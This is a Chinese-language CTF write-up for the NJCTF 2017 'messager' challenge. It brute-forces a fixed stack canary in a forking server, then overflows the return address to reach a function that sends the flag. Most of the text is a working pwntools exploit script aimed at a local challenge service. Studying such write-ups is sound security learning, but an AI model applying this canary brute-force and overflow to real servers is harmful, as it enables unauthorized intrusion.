NJCTF 2017messager

首先要写一个flag文件。

echo “FLAG{THIS_IS_FLAG}” > flag

程序一开始就将flag从文件里去除，存放到unk_602160，相应的也有一个通过socket发送flag的函数sub_400BC6(),最终目的就是控制程序返回到这个函数。
本题开启了Canary保护，但他是每次开启一个子进程，所以Canary的值不变，我们可以将它爆破出来，注：一定要使用python2，如果有师傅知道为什么使用python3不可以的话，也非常希望你能告诉我。

from pwn import *

def leak_canary():
	global canary
	canary = "\x00"
	while len(canary) < 8:
		for x in range(0, 256):
			io = remote("127.0.0.1", 5555)
			io.recv()
			io.send("A"*104 + canary + chr(x))
			try:
				io.recv()
				canary += chr(x)
				break
			except:
				continue
			finally:
				io.close()
	print(canary)
	# print("canary: 0x%s" % canary.encode('hex'))

def pwn():
	io = remote("127.0.0.1", 5555)
	io.rec()

	payload = flat(['A' * 104,canary,"A"*8,p64(0x400bc6)])
	io.send(payload)
	print(io.recvline())

if __name__=='__main__':
	leak_canary()
	pwn()